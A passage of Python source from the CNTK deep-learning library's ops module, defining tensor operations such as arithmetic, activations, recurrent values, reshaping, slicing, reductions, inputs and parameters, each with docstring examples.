op = Plus(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def minus(left, right, name=None):
"""
The output of this operation is left minus right tensor. It supports broadcasting.
In case of scalars its backward pass propagates the received gradient.
The operator (-) has been overloaded and can equally be used instead of minus()
Example:
>>> C.eval(C.minus([1, 2, 3], [4, 5, 6]))
[array([[-3., -3., -3.]])]
>>> C.eval(C.minus([[1,2],[3,4]], 1))
[array([[[ 0., 1.],
[ 2., 3.]]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Minus
op = Minus(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def element_times(left, right, name=None):
"""
The output of this operation is the element-wise product of the two input
tensors. It supports broadcasting. In case of scalars its backward pass to left propagates right
times the received gradient and vice versa.
The operator (*) has been overloaded and can equally be used instead of element_times().
Example:
>>> C.eval(C.element_times([1., 1., 1., 1.], [0.5, 0.25, 0.125, 0.]))
[array([[ 0.5 , 0.25 , 0.125, 0. ]])]
>>> C.eval(C.element_times([5., 10., 15., 30.], [2.]))
[array([[ 10., 20., 30., 60.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import ElementTimes
op = ElementTimes(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def element_divide(left, right, name=None):
"""
The output of this operation is the element-wise division of the two input
tensors. It supports broadcasting. In case of scalars its backward pass to
left propagates :math:`1/right` times the received gradient, and the backward
pass to right propagates.
The operator (/) has been overloaded and can equally be used instead of element_divide().
:math:`(-left/right^2)` times the received gradient.
Example:
>>> C.eval(C.element_divide([1., 1., 1., 1.], [0.5, 0.25, 0.125, 0.]))
[array([[ 2., 4., 8., 0.]])]
>>> C.eval(C.element_divide([5., 10., 15., 30.], [2.]))
[array([[ 2.5, 5. , 7.5, 15. ]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import ElementDivide
op = ElementDivide(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def times(left, right, output_rank=1, name=None):
"""
The output of this operation is the matrix product of the two input matrices.
It supports broadcasting. Sparse is supported in the right operand, if it is a matrix.
The operator '@' has been overloaded such that in Python 3.5 and later X @ W equals times(X, W).
Example:
>>> C.eval(C.times([[1,2],[3,4]], [5,6]))
[array([[ 17., 39.]])]
>>> C.eval(cntk.times(np.reshape(np.arange(8), (2,2,2)),np.reshape(np.arange(8), (2,2,2)), output_rank=1))
[array([[[ 28., 34.],
[ 76., 98.]]])]
>>> C.eval(cntk.times(np.reshape(np.arange(8), (2,2,2)),np.reshape(np.arange(8), (2,2,2)), output_rank=2))
[array([[[[[ 4., 5.],
[ 6., 7.]],
[[ 12., 17.],
[ 22., 27.]]],
[[[ 20., 29.],
[ 38., 47.]],
[[ 28., 41.],
[ 54., 67.]]]]])]
Args:
left: left side matrix or tensor
right: right side matrix or tensor
output_rank (int): in case we have tensors as arguemnts, output_rank represents
the number of axes to be collapsed in order to transform the tensors
into matrices, perform the operation and then reshape back (explode the axes)
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Times
# CNTK uses column vectors and column major representation, thus we reverse
# params
op = Times(right, left, outputRank=output_rank, name=name)
wrap_numpy_arrays(op)
op.rank = op.x.rank + op.y.rank - 2
return op
def identity(x, name=None):
"""
The identity function. It returns an identical tensor to the input tensor `x`:
:math:`pass_tensor(x) = x`
Example:
>>> C.eval(C.pass_tensor([0., 1.]))
[array([[ 0. , 1.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Identity
op = Identity(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
################################################################################
# non_diff ops
################################################################################
def floor(arg, name=None):
"""
The output of this operation is the element wise value rounded to the largest
integer less than or equal to the input.
Example:
>>> C.eval(C.floor([0.2, 1.3, 4., 5.5, 0.0]))
[array([[ 0., 1., 4., 5., 0.]])]
>>> C.eval(C.floor([[0.6, 3.3], [1.9, 5.6]]))
[array([[[ 0., 3.],
[ 1., 5.]]])]
>>> C.eval(C.floor([-5.5, -4.2, -3., -0.7, 0]))
[array([[-6., -5., -3., -1., 0.]])]
>>> C.eval(C.floor([[-0.6, -4.3], [1.9, -3.2]]))
[array([[[-1., -5.],
[ 1., -4.]]])]
Args:
arg: input tensor
name (str): the name of the node in the network (optional)
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Floor
op = Floor(arg, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def ceil(arg, name=None):
"""
The output of this operation is the element wise value rounded to the smallest
integer greater than or equal to the input.
Example:
>>> C.eval(C.ceil([0.2, 1.3, 4., 5.5, 0.0]))
[array([[ 1., 2., 4., 6., 0.]])]
>>> C.eval(C.ceil([[0.6, 3.3], [1.9, 5.6]]))
[array([[[ 1., 4.],
[ 2., 6.]]])]
Args:
arg: input tensor
name (str): the name of the node in the network (optional)
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Ceil
op = Ceil(arg, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def round(arg, name=None):
"""
The output of this operation is the element wise value rounded to the nearest integer.
In case of tie, where element can have exact fractional part of 0.5
this operation follows "round half-up" tie breaking strategy.
This is different from the round operation of numpy which follows
round half to even.
Example:
>>> C.eval(C.round([0.2, 1.3, 4., 5.5, 0.0]))
[array([[ 0., 1., 4., 6., 0.]])]
>>> C.eval(C.round([[0.6, 3.3], [1.9, 5.6]]))
[array([[[ 1., 3.],
[ 2., 6.]]])]
>>> C.eval(C.round([-5.5, -4.2, -3., -0.7, 0]))
[array([[-5., -4., -3., -1., 0.]])]
>>> C.eval(C.round([[-0.6, -4.3], [1.9, -3.2]]))
[array([[[-1., -4.],
[ 2., -3.]]])]
Args:
arg: input tensor
name (str): the name of the node in the network (optional)
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Round
op = Round(arg, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
################################################################################
# non_linear and nn ops
################################################################################
def clip(x, min_value, max_value, name=None):
"""
Computes a tensor with all of its values clipped to fall
between `min_value` and `max_value`, i.e.
``min(max(x, min_value), max_value)``.
The output tensor has the same shape as `x`.
The backward pass propagates the received gradient if no clipping occurred,
and 0 if the value was clipped.
Example:
>>> C.eval(C.clip([1., 2.1, 3.0, 4.1], 2., 4.))
[array([[ 2. , 2.1, 3. , 4. ]])]
>>> C.eval(C.clip([-10., -5., 0., 5., 10.], [-5., -4., 0., 3., 5.], [5., 4., 1., 4., 9.]))
[array([[-5., -4., 0., 4., 9.]])]
Args:
x: tensor to be clipped
min_value: a scalar or a tensor which represents the minimum value to clip element values to
max_value: a scalar or a tensor which represents the maximum value to clip element values to
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Clip
op = Clip(x, min_value, max_value, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def relu(x, name=None):
"""
Rectified linear operation. Computes the element-wise rectified linear
of `x`: ``max(x, 0)``
The output tensor has the same shape as `x`.
Example:
>>> C.eval(C.relu([[-1, -0.5, 0, 1, 2]]))
[array([[[ 0., 0., 0., 1., 2.]]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Relu
op = Relu(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def sigmoid(x, name=None):
"""
Computes the element-wise sigmoid of `x`:
:math:`sigmoid(x) = {1 \over {1+\exp(-x)}}`
The output tensor has the same shape as `x`.
Example:
>>> C.eval(C.sigmoid([-2, -1., 0., 1., 2.]))
[array([[ 0.119203, 0.268941, 0.5 , 0.731059, 0.880797]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Sigmoid
op = Sigmoid(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def tanh(x, name=None):
"""
Computes the element-wise tanh of `x`:
The output tensor has the same shape as `x`.
Example:
>>> C.eval(C.tanh([[1,2],[3,4]]))
[array([[[ 0.761594, 0.964028],
[ 0.995055, 0.999329]]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Tanh
op = Tanh(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def softmax(x, name=None):
"""
Squashes the input values `x` such that they add up to 1:
:math:`softmax(x) = {\exp(x_i) - \max_{x_i \in x}(\exp(x_i)) \over {\sum_{x_i \in x} \exp(x_i)- \max_{x_i \in x}(\exp(x_i)) }}`
The term :math:`\max_{x_i \in x}(\exp(x_i))` is subtracted for numerical
stability.
Example:
>>> C.eval(C.softmax([[1, 1, 2, 3]]))
[array([[[ 0.082595, 0.082595, 0.224515, 0.610296]]])]
>>> C.eval(C.softmax([1, 1]))
[array([[ 0.5, 0.5]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Softmax
op = Softmax(x)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def exp(x, name=None):
"""
Computes the element-wise exponential of `x`:
:math:`exp(x) = {e^x}`
Example:
>>> C.eval(C.exp([0., 1.]))
[array([[ 1. , 2.718282]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Exp
op = Exp(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def log(x, name=None):
"""
Computes the element-wise the natural logarithm of `x`:
Example:
>>> C.eval(C.log([1., 2.]))
[array([[ 0. , 0.69314718056]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
Note:
CNTK returns -85.1 for log(x) if `x` is negative or zero. The reason is that
it uses 1e-37 (whose natural logarithm is -85.1) as the smallest float
number for `log`, because this is the only guaranteed precision across
platforms. This will be changed to return `NaN` and `-inf`.
"""
from cntk.ops.cntk2 import Log
op = Log(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def log_plus(left, right, name=None):
"""
Binary function computing :math:`ln({e^{left} + e^{right}})` in an overflow save way.
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import LogPlus
op = LogPlus(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op.leftMatrix.rank, op.rightMatrix.rank)
return op
def sqrt(x, name=None):
"""
Computes the element-wise square-root of `x`:
:math:`sqrt(x) = {\sqrt[2]{x}}`
Example:
>>> C.eval(C.sqrt([0., 4.]))
[array([[ 0. , 2.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
Note:
CNTK returns zero for sqrt of negative nubmers, this will be changed to
retrun NaN
"""
from cntk.ops.cntk2 import Sqrt
op = Sqrt(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def square(x, name=None):
"""
Computes the element-wise square of `x`:
Example:
>>> C.eval(C.square([1., 10.]))
[array([[ 1. , 100.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Square
op = Square(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def abs(x, name=None):
"""
Computes the element-wise absolute of `x`:
:math:`abs(x) = |x|`
Example:
>>> C.eval(C.abs([-1, 1, -2, 3]))
[array([[ 1., 1., 2., 3.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Abs
op = Abs(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def cond(flag, value_if_true, value_if_false, name=None):
"""
return either value_if_true or value_if_false based on the value of flag.
If flag != 0 value_if_true is returned, otherwise value_if_false.
Behaves analogously to numpy.where(...).
Example:
>>> C.eval(C.cond([-10, -1, 0, 0.3, 100], [1, 10, 100, 1000, 10000], [ 2, 20, 200, 2000, 20000]))
[array([[ 1.00000000e+00, 1.00000000e+01, 2.00000000e+02,
1.00000000e+03, 1.00000000e+04]])]
Args:
flag: tensor
value_if_true: tensor
value_if_false: tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import If
op = If(flag, value_if_true, value_if_false, name = name)
wrap_numpy_arrays(op)
op.rank = max(op.cond.rank,op.thenVal.rank,op.elseVal.rank)
return op
################################################################################
# recurrent ops
################################################################################
def future_value(shape, x, time_step=1, default_hidden_activation=0.1, name=None):
"""
This function returns the future value wrt `x`. It is most often used when
creating RNNs. The resulting tensor has the same shape as the input but is
the next logical sample. The `time_step` parameter is the number of steps
to look into the future and is 1 by default. If there is no future value (i.e.
the current sample is the last one in the tensor) then the `default_hidden_activation`
value is returned which is 0.1 by default.
Example:
>>> data = np.array([[1,2,3,4],[5,6,7,8],[9,10,11,12]])
>>> t = C.dynamic_axis(name='t')
>>> x = C.input_numpy([data], dynamic_axis=t)
>>> with C.LocalExecutionContext('future_value') as ctx:
... print(ctx.eval(C.future_value(0, x)))
[array([[ 5. , 6. , 7. , 8. ],
[ 9. , 10. , 11. , 12. ],
[ 0.1, 0.1, 0.1, 0.1]])]
Args:
shape (tuple): dimensions of the input `x`, the shape will be inferred if zero is passed.
x: the tensor (or its name) from which the future value is obtained.
time_step (int): the number of time steps to look into the future (default 1)
default_hidden_activation (number): the default value to use when no future value is available (default 0.1)
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import FutureValue
op = FutureValue(shape, x, time_step, default_hidden_activation, name = name)
wrap_numpy_arrays(op)
op.rank = get_rank(shape)
return op
def past_value(shape, x, time_step=1, default_hidden_activation=0.1, name=None):
"""
This function returns the past value wrt `x`. It is most often used when
creating RNNs. The resulting tensor has the same shape as the input but is
the previous logical sample. The `time_step` parameter is the number of steps
to look into the past and is 1 by default. If there is no past value (i.e.
the current sample is the first one in the tensor) then the `default_hidden_activation`
value is returned which is 0.1 by default.
Example:
>>> data = np.array([[1,2,3,4],[5,6,7,8],[9,10,11,12]])
>>> t = C.dynamic_axis(name='t')
>>> x = C.input_numpy([data], dynamic_axis=t)
>>> with C.LocalExecutionContext('past_value') as ctx:
... print(ctx.eval(C.past_value(0, x)))
[array([[ 0.1, 0.1, 0.1, 0.1],
[ 1. , 2. , 3. , 4. ],
[ 5. , 6. , 7. , 8. ]])]
Args:
shape (tuple): dimensions of the input `x`, the shape will be inferred if zero is passed.
x: the tensor (or its name) from which the past value is obtained
time_step (int): the number of time steps to look into the past (default 1)
default_hidden_activation (number): the default value to use when no past value is available (default 0.1)
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import PastValue
op = PastValue(shape, x, time_step, default_hidden_activation, name = name)
wrap_numpy_arrays(op)
op.rank = get_rank(shape)
return op
################################################################################
# reshaping ops
################################################################################
def reshape(x, shape, name=None):
"""
Reinterpret input samples as having different tensor dimensions
One dimension may be specified as 0 and will be inferred
The output tensor has the same shape as 'shape'.
The backward pass propagates the received gradient for the output-shape to the input shape.
Examples:
>>> C.eval(C.reshape([[0,1],[2,3],[4,5]], (2,3)))
[array([[[ 0., 4., 3.],
[ 2., 1., 5.]]])]
Args:
x: tensor to be reshaped
shape (tuple): a tuple defining the resulting shape
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import NewReshape
if not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
op = NewReshape(x, shape, 0, 0, name = name)
wrap_numpy_arrays(op)
op.rank = get_rank(shape)
return op
def transpose_dimensions(x, axis1, axis2, name=None):
"""
Reverses two axes of the tensor. The output tensor has the same data but with
axis1 and axis2 swapped.
Examples:
>>> C.eval(C.transpose_dimensions([[0,1],[2,3],[4,5]], 1,2))
[array([[[ 0., 4., 3.],
[ 2., 1., 5.]]])]
Args:
x: tensor to be reshaped
axis1 (int): the axis to swap with axis2
axis2 (int): the axis to swap with axis1
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import TransposeDimensions
op = TransposeDimensions(x, axis1, axis2, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
op.axis1 = abs(axis1) if axis1<0 else op.rank - axis1
op.axis2 = abs(axis2) if axis2<0 else op.rank - axis2
return op
def slice(x, begin_index, end_index, axis=0, name=None):
'''
Slice the input along an axis.
Examples:
>>> # create 2x3 matrix in a sequence of length 1 in a batch of one sample
>>> data = np.asarray([[[1, 2, -3],
... [4, 5, 6]]])
>>> x = C.input_numpy(data)
>>> # slice index 1 (second) at first axis
>>> C.eval(C.slice(x, 1, 2, 0))
[array([[[ 4., 5., 6.]]])]
>>> # slice index 0 (first) at second axis
>>> C.eval(C.slice(x, 0, 1, 1))
[array([[[ 1.],
[ 4.]]])]
NumPy's way of slicing works, too:
Examples:
>>> C.eval(x[1])
[array([[[ 4., 5., 6.]]])]
>>> C.eval(x[:,:2,:])
[array([[[ 1., 2.],
[ 4., 5.]]])]
Args:
x: input tensor
begin_index (int): the index along axis where the slicing starts
end_index (int): the index along axis where the slicing ends
axis (int or str): axis along which `begin_index` and `end_index` will be used. If axis is of type `str` then the time axis will be used.
name (str): the name of the node in the network
See also:
Indexing in NumPy: http://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import Slice
op = Slice(x, begin_index, end_index, axis, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
if isinstance(axis, str):
op.axis = -1 # time axis
else:
op.axis = abs(axis) if axis<0 else op.rank - axis
return op
def splice(inputs, axis=0, name=None):
'''
Concatenate the input tensors along an axis.
Examples:
>>> # create 2x2 matrix in a sequence of length 1 in a batch of one sample
>>> data1 = np.asarray([[[1, 2],
... [4, 5]]])
>>> x = C.input_numpy(data1)
>>> # create 3x2 matrix in a sequence of length 1 in a batch of one sample
>>> data2 = np.asarray([[[10, 20],
... [30, 40],
... [50, 60]]])
>>> y = C.input_numpy(data2)
>>> # splice both inputs on axis=0 returns a 5x2 matrix
>>> C.eval(C.splice((x,y), 0))
[array([[[1, 2],
[4, 5],
[10, 20],
[30, 40],
[50, 60]]])]
Args:
inputs (list): tuple of input tensors
axis (int): axis along which the concatenation will be performed
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import Splice
op = Splice(inputs, axis, name=name)
wrap_numpy_arrays(op)
op.rank = op._[0].rank
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
op.axis = abs(axis) if axis<0 else op.rank - axis
# Splice is implemented using BrainScript code that results in nested nodes,
# if it gets tag='output' the file name might differ depending on the execution
# path in BS. Thus we wrap it by Identity to have a fixed name.
return identity(op)
################################################################################
# reduction ops
################################################################################
def reduce_sum(x, axis=0, name=None):
'''
Computes the sum of the input tensor's elements across one axis. if `axis==rank`,
then the sum will be computed over all axes, that is, the output is a scalar,
which is the sum of tensor's elements.
Examples:
>>> # create 3x2 matrix in a sequence of length 1 in a batch of one sample
>>> data = [[10, 20],[30, 40],[50, 60]]
>>> # reduce over the first axis
>>> C.eval(C.reduce_sum(data, 0))
[array([[[ 90., 120.]]])]
>>> # reduce over the second axis
>>> C.eval(C.reduce_sum(data, 1))
[array([[[ 30.],
[ 70.],
[ 110.]]])]
>>> # reduce over the all axes
>>> C.eval(C.reduce_sum(data, 2))
[array([[ 210.]])]
Args:
x: input tensor
axis (int): axis along which the reduction will be performed
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import ReduceSum
op = ReduceSum(x, axis, name=name)
wrap_numpy_arrays(op)
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
op.axis = abs(axis) if axis<0 else op._[0].rank - axis
op.rank = 0 if op.axis == 0 else op._[0].rank
return op
def reduce_log_sum(inputs, name=None):
'''
Computes the log sum of the input tensor's elements. The output is a scalar,
which is the log sum of tensor's elements.
Examples:
>>> # create 3x2 matrix in a sequence of length 1 in a batch of one sample
>>> data = [[10, 20],[30, 40],[50, 60]]
>>> # reduce over the all axes
>>> C.eval(C.reduce_sum(data))
[array([[ 60.000046]])]
Args:
x: input tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import ReduceLogSum
op = ReduceLogSum(inputs, 0, name=name)
wrap_numpy_arrays(op)
#TODO: Once axis != 0 is supported, expose it as argument, and compute the
#rank similar to reduce_sum
op.rank = 0
#reduce_log_sum is implemented using BrainScript code that results in nested nodes,
#We wrap it by Identity to guarantee that the tag 'output' is passed over and with a fixed name.
return identity(op)
################################################################################
# training ops
################################################################################
def dropout(x, name=None):
"""
Compute a new tensor with `dropoutRate` perecent set to zero. The values
that are set to zero are randomly chosen. This is commonly used to prevent
overfitting during the training process.
The output tensor has the same shape as `x`, but with `dropoutRate` of the
elements set to zero (droped out).
Args:
x: source tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Dropout
op = Dropout(x, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
################################################################################
# variables_and_parameters ops
################################################################################
def input_numpy(value, alias=None, dynamic_axis='', name=None):
'''
Creates an input node from a list of tensors. The tensors represent one
sample and can have sequences of different lengths.
Example:
>>> C.eval(C.input_numpy(np.ones((3, 2))))
[array([[ 1., 1.]]), array([[ 1., 1.]]), array([[ 1., 1.]])]
Args:
value (list): list of tensors potentially having sequences of different lengths.
alias (str): alias to be used in the data file
dynamic_axis (str): whether the tensor has already the data
alias (str): optional the alias to be used when serializing the data into an intermediate file
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from .. import utils
if utils.is_tensor(value) or utils.is_tensor_list(value):
value = np.asarray(value)
if dynamic_axis:
cntk_shape = value[0].shape[1:]
else:
cntk_shape = value[0].shape
if len(cntk_shape) == 0:
raise ValueError('value should be an array of input samples')
op = input(cntk_shape, dynamic_axis=dynamic_axis, name=name)
from ..reader import LazyInputReader
op.reader = LazyInputReader(
value,
input_alias=alias,
dynamic_axis=dynamic_axis,
node=op)
return op
else:
raise ValueError('value type is not supported: %s' % type(value))
def input(shape, dynamic_axis='', name=None):
"""
It creates an input node. The graph requires a separate reader that will be
fed to this input.
Args:
shape (tuple): the shape of the input tensor
dynamic_axis (str or output of :func:`cntk.ops.dynamic_axis`): the dynamic axis
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import Input
if not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
op = Input(shape, dynamicAxis=dynamic_axis, name=name)
op.rank = get_rank(shape)
return op
def sparse_input_numpy(indices, values, shape, alias=None, dynamic_axis='', name=None):
'''
Creates an input node from a sparse input tensors described by a list of indices
and a list of values having a shape. The tensors represent one
sample and can have sequences of different lengths.
Example:
>>>
# Creating a dense matrix
# [[ 10, 20]
# [ 30, 40]]
# Note that we need to specify a batch of samples of sequences (all
# having sequence length 1 in this example).
>>> dense = C.input_numpy([[[10,20,30],
[40,50,60]]])
# Creating a sparse array
# [0, 0.1, 0]
>>> sparse = C.sparse_input_numpy(indices=[(1,)], values=[(0.1,)], shape=(3,))
>>> C.eval(C.times(dense, sparse))
[array([[ 2., 5.]])]
# Creating a sparse matrix
# [[0 ],
[0.1],
[0 ]]
>>> sparse = C.sparse_input_numpy(indices=[(1,)], values=[(0.1,)], shape=(3,1))
>>> C.eval(C.times(dense, sparse))
[array([[[ 2.],
[ 5.]]])]
Args:
indices (list): list (batch) of tuples (indices), which are positions of the values after flattening the tensor with `order='F'`
values (list): list (batch) of tuples of values corresponding to indices
shape (tuple): shape of the input
alias (str): alias to be used in the data file
dynamic_axis (str): whether the tensor has already the data
alias (str): optional the alias to be used when serializing the data into an intermediate file
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
op = sparse_input(shape, dynamic_axis=dynamic_axis, name=name)
from ..reader import LazySparseInputReader
op.reader = LazySparseInputReader(
indices,
values,
shape,
input_alias=alias,
dynamic_axis=dynamic_axis,
node=op)
return op
def sparse_input(shape, dynamic_axis='', name=None):
"""
It creates a sparse input node. The graph requires a separate reader that will be
fed to this input.
Args:
shape (tuple): the shape of the input tensor
dynamic_axis (str or output of :func:`cntk.ops.dynamic_axis`): the dynamic axis
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import SparseInput
if not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
op = SparseInput(shape, dynamicAxis=dynamic_axis, name=name)
op.rank = get_rank(shape)
return op
def parameter(shape=None, value=None, learning_rate_multiplier=1.0,
init_from_file_path=None, name=None):
"""
It creates a parameter tensor.
Args:
shape (tuple or int, optional): the shape of the input tensor. If not provided, it will be inferred from ``value``.
value (scalar or NumPy array, optional): a scalar initial value that would be replicated for every element in the tensor or NumPy array. If ``None``, the tensor will be initialized uniformly random.
learning_rate_multiplier (float): set to control the learning rate on this particular node
init_from_file_path (str): the file that contains the initial tensor value. Used only if ``value=None``.
name (str, optional): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from . import cntk1
if value is None:
if shape is None:
raise ValueError('you need to specify at least shape or value')
if shape is not None and not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
if init_from_file_path:
op = cntk1.ParameterTensor(shape, init='fromFile',
learningRateMultiplier=learning_rate_multiplier,
initFromFilePath=init_from_file_path, name=name)
else:
op = cntk1.ParameterTensor(shape,
learningRateMultiplier=learning_rate_multiplier,
name=name)
op.rank = get_rank(shape)
return op
"""
To be as generic as possible, we
- flatten the data
- initialize a ParameterTensor operator with it
- ensure that the graph does not backprob to it.
- Finally we to reshape it.
"""
from .. import utils
if not (np.isscalar(value) or utils.is_tensor(value)):
raise ValueError('value type is not supported: %s' % type(value))
if isinstance(value, list) or np.isscalar(value):
value = np.asarray(value)
import scipy.sparse
if scipy.sparse.issparse(value):
raise ValueError('only dense data is supported')
param_shape = value.shape if value.shape else (1,)
# cntk uses column major, thus we reverse the shape
param_shape = tuple(reversed(param_shape))
literal_shape = (param_shape[0], np.multiply.reduce(param_shape[1:]))
# cntk expects data in reverse order, thus we transpose first
transposed_val = np.transpose(value)
literal_array = np.reshape(transposed_val, literal_shape, order = 'F')
from io import BytesIO
s = BytesIO()
np.savetxt(s, literal_array, '%.4f')
op = cntk1.ParameterTensor(
dims=param_shape,
learningRateMultiplier=learning_rate_multiplier,
init='fromLiteral',
initFromLiteral=s.getvalue().decode())
op.rank = get_rank(param_shape)
return op
def constant(value, name=None):
"""
It creates a constant tensor initialized from a numpy array
Args:
value: the tensor constant passed as numpy array
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
op = parameter(value=value, learning_rate_multiplier=0.0, name=name)
return op
def dynamic_axis(name=None):
"""
This function creates a dynamic axis object that can be connected to an input.
For sequence-based inputs, this allows the sequences to be of arbitrary lengths
and therefore allows networks to be setup without the need for padding.
Example:
See Examples/LSTM/seqcla.py for a use of :func:`cntk.ops.dynamic_axis`.
Args:
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import DynamicAxis
op = DynamicAxis(name=name)
op.rank = None
return op
def reconcile_dynamic_axis(data_input, layout_input, name=None):
"""
This function adapts the dynamic axis layout for `data_input` to match that
of `layout_input`. It allows these two tensors to be properly compared using, e.g.
a criterion node.
Example:
See Examples/LSTM/seqcla.py for a use of :func:`cntk.ops.reconcile_dynamic_axis`.
Args:
data_input: the tensor to have its dynamic axis layout adapted
layout_input: the tensor layout to use for adapting `data_input`s layout
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import ReconcileDynamicAxis
op = ReconcileDynamicAxis(data_input, layout_input, name=name)
op.rank = data_input.rank
return op
################################################################################
# reduction ops
################################################################################
def reduce_max(value, axis=0, name=None):
"""
For axis >= 1 computes the maximum of a tensor along the specifed axis. In the result the corresponding axis is dropped, i.e. the rank of the result tensore is smaller that the rank of the input tensor.
